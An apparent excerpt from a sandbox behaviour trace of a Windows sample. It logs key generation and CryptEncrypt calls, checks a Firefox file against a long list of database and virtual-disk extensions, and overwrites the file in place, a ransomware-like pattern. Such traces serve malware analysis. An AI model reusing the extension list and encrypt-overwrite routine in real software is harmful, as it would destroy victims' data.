hHeap=0xea0000) returned 1 [0139.804] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0139.804] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0139.804] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0139.805] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk")) returned 0x20 [0139.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0139.840] GetLastError () returned 0x0 [0139.840] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=899) returned 1 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".4dd") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".4dl") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accdb") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accdc") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accde") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accdr") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accdt") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accft") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".adb") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ade") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".adf") returned 0x0 [0139.840] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".adp") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".arc") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ora") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".alf") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ask") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".btr") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".bdf") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".cat") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".cdb") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ckp") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".cma") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".cpd") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dacpac") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dad") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dadiagrams") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".daschema") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".db") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".db-shm") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".db-wal") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".db3") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dbc") returned 0x0 [0139.841] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dbf") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dbs") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dbt") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dbv") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dbx") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dcb") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dct") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dcx") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ddl") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dlis") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dp1") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dqy") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dsk") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dsn") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dtsx") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".dxl") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".eco") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ecx") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".edb") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".epim") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".exb") returned 0x0 [0139.842] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fcd") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fdb") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fic") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fmp") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fmp12") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fmpsl") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fol") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fp3") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fp4") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fp5") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fp7") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fpt") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".frm") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".gdb") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".grdb") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".gwi") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".hdb") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".his") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ib") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".idb") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ihx") returned 0x0 [0139.843] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".itdb") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".itw") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".jet") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".jtx") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".kdb") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".kexi") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".kexic") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".kexis") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".lgc") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".lwx") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".maf") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".maq") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mar") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mas") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mav") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mdb") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mdf") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mpd") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mrg") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mud") returned 0x0 [0139.844] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mwb") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".myd") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ndf") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nnt") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nrmlib") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ns2") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ns3") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".ns4") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nsf") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nv") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nv2") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nwdb") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nyf") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".odb") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".oqy") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".orx") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".owc") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".p96") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".p97") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".pan") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".pdb") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".pdm") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".pnz") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".qry") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".qvd") returned 0x0 [0139.853] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".rbf") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".rctd") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".rod") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".rodx") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".rpd") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".rsd") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sas7bdat") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sbf") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".scx") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sdb") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sdc") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sdf") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sis") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".spq") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sql") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sqlite") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sqlite3") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".sqlitedb") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".te") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".temx") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".tmd") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".tps") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".trc") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".trm") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".udb") returned 0x0 [0139.854] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".udl") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".usr") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".v12") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vis") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vpd") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vvv") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".wdb") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".wmdb") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".wrk") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".xdb") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".xld") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".xmlff") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".abcddb") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".abs") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".abx") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".accdw") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".adn") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".db2") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".fm5") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".hjt") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".icg") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".icr") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".kdb") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".lut") returned 0x0 [0139.855] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".maw") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mdn") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".mdt") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vdi") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vhd") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmdk") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".pvm") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmem") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmsn") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmsd") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".nvram") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmx") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".raw") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".qcow2") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".subvol") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".bin") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vsv") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".avhd") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmrs") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vhdx") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".avdx") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".vmcx") returned 0x0 [0139.856] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk", lpSrch=".iso") returned 0x0 [0139.856] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.856] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.876] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.876] SetEndOfFile (hFile=0x6c4) returned 1 [0139.876] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.876] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x383, lpOverlapped=0x0) returned 1 [0139.876] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.876] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x383, lpOverlapped=0x0) returned 1 [0139.876] CloseHandle (hObject=0x6c4) returned 1 [0139.883] GetProcessHeap () returned 0xea0000 [0139.883] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, 